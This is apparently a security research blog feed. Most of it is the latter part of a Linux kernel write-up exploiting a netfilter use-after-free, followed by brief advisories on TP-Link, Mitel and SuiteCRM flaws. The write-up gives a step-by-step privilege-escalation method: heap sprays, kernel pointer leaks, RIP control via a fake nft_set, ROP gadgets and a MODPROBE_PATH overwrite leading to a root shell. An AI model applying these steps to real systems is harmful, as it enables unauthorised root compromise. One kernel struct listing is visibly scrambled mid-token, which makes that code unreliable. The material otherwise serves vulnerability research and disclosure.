            long unsigned int *        open_fds;             /*    24     8 */
            long unsigned int *        full_fds_bits;        /*    32     8 */
            struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */
    
            /* size: 56, cachelines: 1, members: 6 */
            /* sum members: 52, holes: 1, sum holes: 4 */
            /* forced alignments: 1 */
            /* last cacheline: 56 bytes */
    } __attribute__((__aligned__(8)));
    The size of an fdtable object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace nft_lookup objects. It has a member of interest at offset 24 (open_fds), which is a pointer to an unsigned long integer array. The allocation of fdtable objects is done by the kernel function alloc_fdtable(), which can be reached with the following call stack.
    alloc_fdtable()
     |  
     +- dup_fd()
        |
        +- copy_files()
          |
          +- copy_process()
            |
            +- kernel_clone()
              |
              +- fork() syscall
    Therefore, by calling the fork() system call the current process is copied and thus the currently open files. This is done by allocating a new file descriptor table object (fdtable), if required, and copying the currently open file descriptors to it. The allocation of a new fdtable object only happens when the number of open file descriptors exceeds NR_OPEN_DEFAULT, which is defined as 64 on 64-bit machines. The following listing shows this check.
    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

    /* * Allocate a new files structure and copy contents from the * passed in files structure. * errorp will be valid only when the returned files_struct is NULL. */ struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp) { struct files_struct *newf; struct file **old_fds, **new_fds; unsigned int open_files, i; struct fdtable *old_fdt, *new_fdt; *errorp = -ENOMEM; newf = kmem_cache_alloc(files_cachep, GFP_KERNEL); if (!newf) goto out; atomic_set(&newf->count, 1); spin_lock_init(&newf->file_lock); newf->resize_in_progress = false; init_waitqueue_head(&newf->resize_wait); newf->next_fd = 0; new_fdt = &newf->fdtab; [1] new_fdt->max_fds = NR_OPEN_DEFAULT; new_fdt->close_on_exec = newf->close_on_exec_init; new_fdt->open_fds = newf->open_fds_init; new_fdt->full_fds_bits = newf->full_fds_bits_init; new_fdt->fd = &newf->fd_array[0]; spin_lock(&oldf->file_lock); old_fdt = files_fdtable(oldf); open_files = sane_fdtable_size(old_fdt, max_fds); /* * Check whether we need to allocate a larger fd array and fd set. */ [2] while (unlikely(open_files > new_fdt->max_fds)) { spin_unlock(&oldf->file_lock); if (new_fdt != &newf->fdtab) __free_fdtable(new_fdt); [3] new_fdt = alloc_fdtable(open_files - 1); if (!new_fdt) { *errorp = -ENOMEM; goto out_release; } [Truncated] } [Truncated] return newf; out_release: kmem_cache_free(files_cachep, newf); out: return NULL; }

    At [1] the max_fds member of new_fdt is set to NR_OPEN_DEFAULT. Afterwards, at [2] the loop executes only when the number of open files exceeds the max_fds value. If the loop executes, at [3] a new fdtable object is allocated via the alloc_fdtable() function.

    Therefore, to force the allocation of fdtable objects in order to replace a given free object from kmalloc-cg-64 the following steps must be taken:

    1. Create more than 64 open file descriptors. This can be easily done by calling the dup() function to duplicate an existing file descriptor, such as the stdout. This step should be done before triggering the free of the object to be replaced with an fdtable object, since the dup() system call also ends up allocating fdtable objects that can interfere.
    2. Once the target object has been freed, fork the current process a large number of times. Each fork() execution creates one fdtable object.

    The free of the open_fds pointer is triggered when the fdtable object is destroyed in the __free_fdtable() function.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

    static void __free_fdtable(struct fdtable *fdt) { kvfree(fdt->fd); kvfree(fdt->open_fds); kfree(fdt); }

    Therefore, the partial free via the overwritten open_fds pointer can be triggered by simply terminating the child process that allocated the fdtable object.

    Leaking Pointers

    The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the msg_msg structure, which is allocated in kmalloc-cg-* slab caches starting from kernel version 5.14.

    The msg_msg structure acts as a header of System V messages that can be created via the userland msgsnd() function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

    struct msg_msg { struct list_head m_list; /* 0 16 */ long int m_type; /* 16 8 */ size_t m_ts; /* 24 8 */ struct msg_msgseg * next; /* 32 8 */ void * security; /* 40 8 */ /* size: 48, cachelines: 1, members: 5 */ /* last cacheline: 48 bytes */ };

    Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.

    It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the msg_msg header. This restriction discards the nft_lookup object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the msg_msg.m_ts member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the m_ts member is not negative when interpreted as a signed long integer and heap addresses start with 0xffff, making it a negative long integer. 

    Leaking an nft_set Pointer

    Leaking a pointer to an nft_set object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

    1. Create a target set where the expressions will be bound to.

    2. Create a rule with a lookup expression bound to the target set from step 1.

    3. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF.

    4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via msgsnd() function). Tag all the messages at offset 24 so the one corrupted with the nft_set pointer can later be identified.

    5. Remove the rule created, which will remove the entry of the nft_lookup expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target nft_set object where the original binding.list.prev member was (offset 72). Since the freed nft_dynset object was replaced by a System V message, the pointer to the nft_set will be written at offset 24 within the message data.

    6. Use the userland msgrcv() function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the nft_set.

    Leaking a Kernel Function Pointer

    Leaking a kernel pointer requires a bit more work than leaking a pointer to an nft_set object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using fdtable object already described. The steps followed to leak a pointer to a kernel function are the following.

    1. Increase the number of open file descriptors by calling dup() on stdout 65 times.

    2. Create a target set where the expressions will be bound to (different from the one used in the `nft_set` adress leak).

    3. Create a set with an embedded nft_lookup expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_lookup object will be freed but not removed from the target set bindings list, causing a UAF.

    4. Spray fdtable objects in order to replace the freed nft_lookup from step 3.

    5. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the open_fds member of the fdtable object (allocated in step 4) that replaced the nft_lookup object.

    6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via msgsnd() function). Tag all the messages at offset 8 so the one corrupted can be identified.

    7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the nft_dynset object, effectively causing a UAF to a part of a System V message.

    8. Spray time_namespace objects in order to replace the partially freed System V message allocated in step 7. The reason for using the time_namespace objects is explained later.

    9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use msgrcv() to read the data from it, which is overlapping with the newly allocated time_namespace object. The offset 40 of the data portion of the System V message corresponds to time_namespace.ns->ops member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.

    10. Clean-up the child processes used to spray the time_namespace objects.

    time_namespace objects are interesting because they contain an ns_common structure embedded in them, which in turn contains an ops member that points to a function table with functions defined within the kernel core. The time_namespace structure definition is listed below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

    struct time_namespace { struct user_namespace * user_ns; /* 0 8 */ struct ucounts * ucounts; /* 8 8 */ struct ns_common ns; /* 16 24 */ struct timens_offsets offsets; /* 40 32 */ /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */ struct page * vvar_page; /* 72 8 */ bool frozen_offsets; /* 80 1 */ /* size: 88, cachelines: 2, members: 6 */ /* padding: 7 */ /* last cacheline: 24 bytes */ };

    At offset 16, the ns member is found. It is an ns_common structure, whose definition is the following.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

    struct ns_common { atomic_long_t stashed; /* 0 8 */ const struct proc_ns_operations * ops; /* 8 8 */ unsigned int inum; /* 16 4 */ refcount_t count; /* 20 4 */ /* size: 24, cachelines: 1, members: 4 */ /* last cacheline: 24 bytes */ };

    At offset 8 within the ns_common structure the ops member is found. Therefore, time_namespace.ns->ops is at offset 24.

    Spraying time_namespace objects can be done by calling the unshare() system call and providing the CLONE_NEWUSER and CLONE_NEWTIME. In order to avoid altering the execution of the current process the unshare() executions can be done in separate processes created via fork().

    clone_time_ns()
      |
      +- copy_time_ns()
        |
        +- create_new_namespaces()
          |
          +- unshare_nsproxy_namespaces()
            |
            +- unshare() syscall

    The CLONE_NEWTIME flag is required because of a check in the function copy_time_ns() (listed below) and CLONE_NEWUSER is required to be able to use the CLONE_NEWTIME flag from an unprivileged user.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

    /** * copy_time_ns - Create timens_for_children from @old_ns * @flags: Cloning flags * @user_ns: User namespace which owns a new namespace. * @old_ns: Namespace to clone * * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children; * adds a refcounter to @old_ns otherwise. * * Return: timens_for_children namespace or ERR_PTR. */ struct time_namespace *copy_time_ns(unsigned long flags, struct user_namespace *user_ns, struct time_namespace *old_ns) { if (!(flags & CLONE_NEWTIME)) return get_time_ns(old_ns); return clone_time_ns(user_ns, old_ns); }

    RIP Control

    Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an nft_set object whose address is known and replace it with a fake nft_set object created with a System V message. The nft_set objects contain an ops member, which is a function table of type nft_set_ops. Crafting this function table and triggering the right call will lead to RIP control.

    The following is the definition of the nft_set_ops structure.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

    struct nft_set_ops { bool (*lookup)(const struct net *, const struct nft_set *, const u32 *, const struct nft_set_ext * *); /* 0 8 */ bool (*update)(struct nft_set *, const u32 *, void * (*)(struct nft_set *, const struct nft_expr *, struct nft_regs *), const struct nft_expr *, struct nft_regs *, const struct nft_set_ext * *); /* 8 8 */ bool (*delete)(const struct nft_set *, const u32 *); /* 16 8 */ int (*insert)(const struct net *, const struct nft_set *, const struct nft_set_elem *, struct nft_set_ext * *); /* 24 8 */ void (*activate)(const struct net *, const struct nft_set *, const struct nft_set_elem *); /* 32 8 */ void * (*deactivate)(const struct net *, const struct nft_set *, cstimate *); /* 88 8 */ int (*init)(const struct nft_set *, const struct nft_set_desc *, const struct nlattr * const *); /* 96 8 */ void (*destroy)(const struct nft_set *); /* onst struct nft_set_elem *); /* 40 8 */ bool (*flush)(const struct net *, const struct nft_set *, void *); /* 48 8 */ void (*remove)(const struct net *, const struct nft_set *, const struct nft_set_elem *); /* 56 8 */ /* --- cacheline 1 boundary (64 bytes) --- */ void (*walk)(const struct nft_ctx *, struct nft_set *, struct nft_set_iter *); /* 64 8 */ void * (*get)(const struct net *, const struct nft_set *, const struct nft_set_elem *, unsigned int); /* 72 8 */ u64 (*privsize)(const struct nlattr * const *, const struct nft_set_desc *); /* 80 8 */ bool (*estimate)(const struct nft_set_desc *, u32, struct nft_set_e104 8 */ void (*gc_init)(const struct nft_set *); /* 112 8 */ unsigned int elemsize; /* 120 4 */ /* size: 128, cachelines: 2, members: 16 */ /* padding: 4 */ };

    The delete member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the nft command, a very simple one can be as follows:

    nft add table inet test_dynset
    nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
    nft add set inet test_dynset my_set { type ipv4_addr\; }
    nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

    The snippet above shows the creation of a table, a chain, and a set that contains elements of type ipv4_addr (i.e. IPv4 addresses). Then a rule is added, which deletes the item 127.0.0.1 from the set my_set when an incoming packet has the source IPv4 address 127.0.0.1. Whenever a packet matching that criteria is processed via nftables, the delete function pointer of the specified set is called.

    Therefore, RIP control can be achieved with the following steps. Consider the target set to be the nft_set object whose address was already obtained.

    1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 127.0.0.1.
    2. Partially free the nft_set object from which the address was obtained.
    3. Spray System V messages containing a partially fake nft_set object containing a fake ops table, with a given value for the ops->delete member.
    4. Trigger the call of nft_set->ops->delete by locally sending a network packet to 127.0.0.1. This can be done by simply opening a TCP socket to 127.0.0.1 at any port and issuing a connect() call.

    Escalating Privileges

    Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

    A way of achieving this is as follows:

    1. Pivot the stack to a memory area under control. When the delete function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an immediate expression in the rule created to achieve RIP control.
    2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the MODPROBE_PATH global variable, the stack is pivoted again to the end of the fake nft_set used for RIP control.
    3. Build a ROP chain to overwrite the MODPROBE_PATH global variable. Place it at the end of the nft_set mentioned in step 2.
    4. Return to userland by using the KPTI trampoline.
    5. Drop to a privileged shell by leveraging the overwritten MODPROBE_PATH global variable.

    The stack pivot gadgets and ROP chain used can be found below.

    // ROP gadget to pivot the stack to the nftables registers memory area
    0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
    // ROP gadget to pivot the stack to the memory allocation holding the target nft_set
    0xffffffff810b08f1: pop rsp ; ret ;

    When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake nft_set object.

    // ROP chain used to overwrite the MODPROBE_PATH global variable
    
    0xffffffff8148606b: pop rax ; ret ;
    0xffffffff8120f2fc: pop rdx ; ret ;
    0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

    It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.

    Wrapping Up

    We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.

    We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!

    The post Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg appeared first on Exodus Intelligence.

    TP-Link WR940N/WR941ND Uninitialized Pointer Vulnerability

    23 June 2022 at 18:56

    EIP-9ad27c94

    An uninitialized pointer vulnerability exists within TP-Link’s WR940N and WR941ND SOHO router devices specifically during the processing of UPnP/SOAP SUBSCRIBE requests. Successful exploitation allow local unauthenticated attackers the ability to execute arbitrary code under the context of the ‘root’ user.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-9ad27c94
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 8.3

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WR940N/WR941ND Uninitialized Pointer Vulnerability appeared first on Exodus Intelligence.

    TP-Link WA850RE Unauthenticated Configuration Disclosure Vulnerability

    23 June 2022 at 18:56

    EIP-9098806c

    A vulnerability exists within the httpd server of the TP-Link WA850RE Universal Wi-Fi Range Extender that allows remote unauthenticated attackers to download the configuration file. Retrieval of this file results in the exposure of admin credentials and other sensitive information.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-9098806c
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 8.3

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WA850RE Unauthenticated Configuration Disclosure Vulnerability appeared first on Exodus Intelligence.

    TP-Link WA850RE Remote Command Injection Vulnerability

    23 June 2022 at 18:56

    EIP-7758d2d4

    A vulnerability exists within the httpd server of the TP-Link WA850RE Universal Wi-Fi Range Extender that allows authenticated attackers to inject arbitrary commands as arguments to an execve() call due to a lack of input sanitization. Injected commands are executed with root privileges. This issue is further exacerbated when combined with the configuration leak from EIP-9098806c.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-7758d2d4
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 7.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WA850RE Remote Command Injection Vulnerability appeared first on Exodus Intelligence.

    Mitel Web Management Interface Buffer Overflow Vulnerability

    9 June 2022 at 17:46

    EIP-c4542e4d

    A stack-based buffer overflow vulnerability exists within multiple Mitel product web management interfaces, including the 3300 Controller and MiVoice Business product lines. Improper handling of the ‘Lang’ query parameter allows remote unauthenticated attackers to execute arbitrary code.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-c4542e4d
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 10.0

    Vendor References

    Discovery Credit

    • Austin Martinetti and Brett Bryant working through the our Research Sponsorship Program (RSP).

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post Mitel Web Management Interface Buffer Overflow Vulnerability appeared first on Exodus Intelligence.

    SalesAgility SuiteCRM ‘export’ Request SQL Injection Vulnerability

    9 June 2022 at 17:21

    EIP-0f5d2d7f

    A SQL injection vulnerability exists within SalesAgility SuiteCRM within the processing of the ‘uid’ parameter within the ‘export’ functionality. Successful exploitation allows remote unauthenticated attackers to ultimately execute arbitrary code.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-0f5d2d7f
    • MITRE CVE: Pending

    Vulnerability Metrics

    • CVSSv2 Score: 9.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: March 2nd, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program.

    The post SalesAgility SuiteCRM ‘export’ Request SQL Injection Vulnerability appeared first on Exodus Intelligence.

    SalesAgility SuiteCRM ‘deleteAttachment’ Type Confusion Vulnerability

    9 June 2022 at 17:21

    EIP-0077b802

    A type confusion vulnerability exists within SalesAgility SuiteCRM within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-0077b802
    • MITRE CVE: Pending

    Vulnerability Metrics

    • CVSSv2 Score: 9.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: March 2nd, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program.

    The post SalesAgility SuiteCRM ‘deleteAttachment’ Type Confusion Vulnerability appeared first on Exodus Intelligence.

    ❌
    ❌